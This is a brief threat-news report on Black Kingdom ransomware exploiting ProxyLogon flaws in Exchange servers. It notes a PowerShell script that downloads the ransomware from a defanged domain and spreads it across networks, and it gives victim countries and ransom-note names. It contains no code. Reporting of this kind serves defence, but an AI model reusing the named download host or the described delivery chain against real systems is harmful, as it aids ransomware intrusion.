TeamHood Black Kingdom ransomware is frequently exploiting the Microsoft exchange server ProxyLogon Vulnerabilities. Marcus Hutchins form MalwareTechBlog notified that threat actor was compromising Microsoft Exchange servers via the ProxyLogon vulnerabilities to deploy ransomware.
Hutchins states that the threat actor used the vulnerability to execute a PowerShell script that downloads the ransomware executable from ‘yuuuuu44[.]com’ and then pushes it out to other computers on the network.
Initially the Black Kingdom ransomware victims are from USA, Canada, Austria, Switzerland, Russia, France, Israel, United Kingdom, Italy, Germany, Greece, Australia, and Croatia.
When encrypting devices, the ransomware will encrypt files using random extensions and then create a ransom note named decrypt_file.TxT, as shown below. Hutchins states that he saw a different ransom note named ReadMe.txt that uses slightly different text.
In June 2020 Black Kingdom malware has exploited the Pulse VPN Vulnerability. Hutchins states that the current ransomware executable is a Python script compiled into a Windows executable.
Emsisoft may be able to provide some help in recovering files if they are encrypted with recent Black Kingdom ransomware.
